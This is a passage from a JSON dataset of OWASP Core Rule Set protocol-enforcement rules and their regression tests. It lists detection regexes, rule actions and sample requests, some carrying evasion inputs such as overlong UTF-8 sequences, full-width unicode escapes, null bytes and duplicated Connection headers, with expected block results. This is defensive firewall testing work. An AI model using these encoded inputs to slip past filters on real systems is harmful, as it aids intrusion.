"OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Connection": "keep-alive", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920210 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 2, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Connection": "keep-alive,keep-alive", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920210 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 3, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Connection": "keep-alive,close", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920210 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 4, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Connection": "close,close", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920210 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 5, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Connection": "User-Agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920210 ] }, "malicious_patterns": [] }, { "description": "Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions", "test_id": 6, "request": { "method": "GET", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Connection": "keep-alive, keep-alive", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920210 ] }, "malicious_patterns": [] }, { "description": "Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions", "test_id": 7, "request": { "method": "GET", "uri": "/", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Connection": "close, close", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920210 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 344, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Connection", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b", "actions": [ { "act_name": "id", "lineno": 345, "act_quote": "no_quote", "act_arg": "920210", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 346, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 347, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 348, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 349, "act_quote": "quotes", "act_arg": "Multiple/Conflicting Connection Header Data Found", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 350, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 351, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 352, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 353, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 354, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 355, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 356, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 357, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 358, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 359, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 360, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 361, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 344 } }, { "rule_id": "920250", "has_tests": true, "detection": { "variables": [ { "name": "TX", "part": "CRS_VALIDATE_UTF8_ENCODING", "negated": false } ], "operator": { "type": "@eq", "argument": "1", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "UTF8 Encoding Abuse Attack Attempt", "logdata": "%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/255/153/267" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/?param=%c0%af", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Keep-Alive": "300", "Proxy-Connection": "keep-alive" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920250 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "param=%c0%af" } ] }, { "description": "", "test_id": 2, "request": { "method": null, "uri": "/?param=%c0", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Keep-Alive": "300", "Proxy-Connection": "keep-alive" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920250 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "param=%c0" } ] }, { "description": "", "test_id": 3, "request": { "method": null, "uri": "/?param=%F5%80%BF%BF", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Keep-Alive": "300", "Proxy-Connection": "keep-alive" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920250 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "param=%F5%80%BF%BF" } ] }, { "description": "Status Page Test - Invalid UTF-8 encoding: %C2%A3 is a valid Pound sign; %E2%A3 is invalid UTF-8 (incorrect starting binary sequence)", "test_id": 4, "request": { "method": null, "uri": "/?param=%E2%A3", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Keep-Alive": "300", "Proxy-Connection": "keep-alive" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920250 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "param=%E2%A3" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 373, "variables": [ { "variable": "TX", "variable_part": "CRS_VALIDATE_UTF8_ENCODING", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@eq", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 374, "act_quote": "no_quote", "act_arg": "920250", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 375, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 376, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 377, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 378, "act_quote": "quotes", "act_arg": "UTF8 Encoding Abuse Attack Attempt", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 379, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 380, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 381, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 382, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 383, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 384, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 385, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 386, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 387, "act_quote": "quotes", "act_arg": "capec/1000/255/153/267", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 388, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 389, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 390, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 373 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false } ], "operator": { "type": "@validateUtf8Encoding", "argument": "", "negated": false } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 391, "variables": [ { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@validateUtf8Encoding", "operator_argument": "", "actions": [ { "act_name": "setvar", "lineno": 392, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 391 } }, { "rule_id": "920260", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_URI", "part": "", "negated": false }, { "name": "REQUEST_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)%uff[0-9a-f]{2}", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "Unicode Full/Half Width Abuse Attack Attempt", "logdata": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "WARNING", "tags": [ "application-multi", "language-multi", "platform-iis", "platform-windows", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/255/153/267/72" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/get?test=%uff0F", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920260 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=%uff0F" } ] }, { "description": "", "test_id": 2, "request": { "method": null, "uri": "/get?test=%u0F", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920260 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=%u0F" } ] }, { "description": "Test taken from existing modsec regression", "test_id": 3, "request": { "method": null, "uri": "/get?param=foo%uFF01", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Keep-Alive": "300", "Proxy-Connection": "keep-alive" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920260 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "param=foo%uFF01" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 417, "variables": [ { "variable": "REQUEST_URI", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)%uff[0-9a-f]{2}", "actions": [ { "act_name": "id", "lineno": 418, "act_quote": "no_quote", "act_arg": "920260", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 419, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 420, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 421, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 422, "act_quote": "quotes", "act_arg": "Unicode Full/Half Width Abuse Attack Attempt", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 423, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 424, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 425, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 426, "act_quote": "quotes", "act_arg": "platform-iis", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 427, "act_quote": "quotes", "act_arg": "platform-windows", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 428, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 429, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 430, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 431, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 432, "act_quote": "quotes", "act_arg": "capec/1000/255/153/267/72", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 433, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 434, "act_quote": "quotes", "act_arg": "WARNING", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 435, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 417 } }, { "rule_id": "920270", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_URI_RAW", "part": "", "negated": false }, { "name": "REQUEST_HEADERS", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false } ], "operator": { "type": "@validateByteRange", "argument": "1-255", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Invalid character in request (null character)", "logdata": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/?test%00=test1", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920270 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test%00=test1" } ] }, { "description": "", "test_id": 2, "request": { "method": null, "uri": "/?test=test1%00", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920270 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=test1%00" } ] }, { "description": "", "test_id": 3, "request": { "method": null, "uri": "/?test%00=test1", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920270 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test%00=test1" } ] }, { "description": "", "test_id": 4, "request": { "method": null, "uri": "/?test=test1", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost%00", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=test1" } ] }, { "description": "", "test_id": 5, "request": { "method": null, "uri": "/?test=test1", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Referer": "anything%00", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920270 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=test1" } ] }, { "description": "", "test_id": 6, "request": { "method": null, "uri": "/?test%40=test1", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920270 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test%40=test1" } ] }, { "description": "", "test_id": 7, "request": { "method": null, "uri": "/?test%FD=test1", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920270 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test%FD=test1" } ] }, { "description": "Test converted from old tests", "test_id": 8, "request": { "method": null, "uri": "/?param=foo%00", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language": "en-us,en;q=0.5", "Keep-Alive": "300", "Proxy-Connection": "keep-alive" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920270 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "param=foo%00" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 475, "variables": [ { "variable": "REQUEST_URI_RAW", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@validateByteRange", "operator_argument": "1-255", "actions": [ { "act_name": "id", "lineno": 476, "act_quote": "no_quote", "act_arg": "920270", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 477, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 478, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 479, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 479, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 480, "act_quote": "quotes", "act_arg": "Invalid character in request (null character)", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 481, "act_quote": "quotes", "act_arg": "%{MATCHED_VAR_NAME}=%{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 482, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 483, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 484, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 485, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 486, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 487, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 488, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ENFORCEMENT", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 489, "act_quote": "quotes", "act_arg": "capec/1000/210/272", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 490, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 491, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 492, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 475 } }, { "rule_id": "920280", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Host", "negated": false } ], "operator": { "type": "@eq", "argument": "0", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "1", "message": "Request Missing a Host Header", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ENFORCEMENT", "capec/1000/210/272" ] }, "test_cases": [ { "description": "", "test_id": 1, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 920280 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 2, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 920280 ] }, "malicious_patterns": [] }, { "description": "", "test_id": 3, "request": { "method": null, "uri": "/", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 508, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Host", "quote_type": "no_quote", "negated": false, "counter": true } ], "operator": "@eq", "operator_argument": "0", "actions": [ { "act_name": "id", "lineno": 509, "act_quote": "no_quote", "act_arg": "920280", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 510, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 511, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 512, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 513, "act_quote": "quotes", "act_arg": "Request Missing a Host Header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 514, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 515, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": 